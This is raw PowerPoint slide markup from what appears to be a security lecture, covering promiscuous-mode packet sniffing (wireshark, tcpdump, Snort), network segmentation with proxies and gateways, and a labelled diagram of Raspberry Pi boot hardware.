              <a:t>Promiscuous mode on NIC or router passes all frames to OS interface not just frames addressed to the computer’s MAC address.  Used by:</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wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> which is a packet analyzer used to display all TCP/IP traffic transmitted or received over a network.</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Packet analyzers like Snort also sniff all traffic passing through the network interface.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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3372689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9" y="113983"/>
            <a:ext cx="11113909" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network segmentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769172" y="1792941"/>
            <a:ext cx="10653656" cy="4190817"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Routers, proxies and gateways can be used to segment networks.  For example, they may segregate “trusted” traffic that flows within an organization from traffic to or from the public internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Proxy servers act as  intermediary network clients.  Proxies often have rules “whitelisting” IP addresses or even ports that clients may access.  Proxies may also perform services, such as terminating TLS connections, before forwarding communications to its clients.  Some proxies simply load balance requests among a set of other servers providing services.  Most organizations have proxies that face the public internet so all such public traffic can be logged and inspected for malicious code.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In many cases, a single network backbone bears traffic from many network segments which are segregated by router protocols or encryption.  Sometimes, network segmentation is employed as a mechanism to provide network resource management by limiting active connections or critical endpoints.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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148172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 y="-25475"/>
            <a:ext cx="11401063" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Raspberry Pi detailed boot: hardware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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D93A69B-0C5F-FA45-8AA8-8BCA31344D33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="845127" y="6151418"/>
            <a:ext cx="6572633" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From “Have your Pi and eat it too, Vasudevan and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chaki</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA2EEB89-650C-0C40-A4C2-A389E166AA1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="845127" y="1256681"/>
            <a:ext cx="2092037" cy="100160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CD99DD2-613B-4B42-8CB4-E405BD618B9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080655" y="1427016"/>
            <a:ext cx="1606530" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ARM cores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Cortex-A53)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7907917-5F9F-E544-9CF4-2E7C2CBE05F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7065809" y="1228968"/>
            <a:ext cx="2092037" cy="100160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90C071-DD02-8F47-90F6-3D532FDFC12D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7301337" y="1399303"/>
            <a:ext cx="1215397" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VC4 GPU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Right Arrow 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F77F7A4A-68F0-6B40-A27B-6A71919B8A33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969111" y="2358003"/>
            <a:ext cx="1731221"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3459C31-561F-DC48-8E07-15626D5D7F01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1049656" y="2632340"/>
            <a:ext cx="1499128" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arm AXI Bus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1DD7D4F-51BB-D746-97C3-64AAF5DB6A84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7267054" y="2333354"/>
            <a:ext cx="1731221"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B5CD50-4C52-2B4A-BFEA-3E5D8408D3FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7347599" y="2607691"/>
            <a:ext cx="1519968" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VC4 AXI Bus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF858AE3-C624-ED4D-BDE3-B5C6130963ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3085425" y="3002604"/>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D189348-19E0-2D44-813D-3BDD36B703DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3103214" y="3037240"/>
            <a:ext cx="1122423" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BusMMU</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E537E54-1BFA-ED47-B170-E242D98FCD96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4650990" y="3406572"/>
            <a:ext cx="2248573" cy="81906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767DC33-297B-A749-B84C-E79596A73320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181401" y="3535149"/>
            <a:ext cx="1106393" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{279539E8-4F8C-484C-8F6E-6E4A81FF898A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1118073" y="4637436"/>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2FF141A-F05F-1C48-A1C6-0AB7F76D3392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135862" y="4672072"/>
            <a:ext cx="564578" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F8D6D3F-9537-2F47-AF1E-88F81AD1855F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1131923" y="5458911"/>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E0CD7D9-6141-6245-94D8-E385E8EF1588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149712" y="5493547"/>
            <a:ext cx="854721" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Timers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B150A3E-CE5C-2C4D-A3A4-031B4E101696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3267876" y="4634112"/>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D080D21-A11E-D34D-A968-4B4C55B5B81F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3479630" y="4643971"/>
            <a:ext cx="561372" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{049B93EF-3C0D-5E40-B6F7-52470AFCAD74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4706404" y="4637431"/>
            <a:ext cx="1932096"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EDE21A5-8B2E-EF44-8EF2-071F33C06DB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724193" y="4672067"/>
            <a:ext cx="1983235" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DMA Controllers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89DE0883-B7AA-0F4C-BCDC-6B232CAEA843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7435749" y="4637426"/>
            <a:ext cx="1932096"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49531D6-2195-9A43-899D-F2BFBE3A8031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7453538" y="4672062"/>
            <a:ext cx="1064715" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mailbox</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A82FE979-EAF4-8C4C-AB56-C5A84192A471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3483069" y="5347570"/>
            <a:ext cx="3934684"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CAB0487-3A08-8640-A3CE-3E9459DFCC4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3990100" y="5392394"/>
            <a:ext cx="3200198" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Peripherals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Right Arrow 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4121A3A5-5385-C443-9333-1B0EA9774CB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1026964" y="3212860"/>
            <a:ext cx="1280862"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DE0F1C77-4ACB-C84E-9253-9A2DA0667A4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7365583" y="3236855"/>
            <a:ext cx="1280862"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664D71-B214-D44D-83E6-F0F896FACB6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332509" y="4447307"/>
            <a:ext cx="10529455" cy="1681683"/>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BA4B3F7-459E-994E-84C3-4A5D146088DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9583199" y="2448421"/>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2E95B4C-58D7-D44A-840D-C65C4CCDC7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9600988" y="2483057"/>
            <a:ext cx="894797" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RAMC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A94C4C8-13C0-CC46-B02B-70BD73AB290B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9597049" y="2961041"/>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59F4EA-97CB-334A-BBD1-435B28F72BD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9614838" y="2995677"/>
            <a:ext cx="723275" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PLLC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E47B3936-585F-9245-8C8F-74C8F44E12F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9597047" y="3487516"/>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E333BBC-8236-4447-BD9B-2F0BDA7171A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9614836" y="3522152"/>
            <a:ext cx="1007007" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NvRAM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectangle 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA55AA41-197B-3147-B4AD-1CE180F82E82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9406614" y="2135549"/>
            <a:ext cx="1455350" cy="2140058"/>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8C74E9C0-AB0F-7A43-925B-B323224C3ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918855" y="3315433"/>
            <a:ext cx="104601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3FBE2E-7786-A348-8045-9F1E2FEB44D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8306458" y="3365009"/>
            <a:ext cx="104601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8BACA8C-D8F8-2F4C-8CB1-AB86A301F09B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
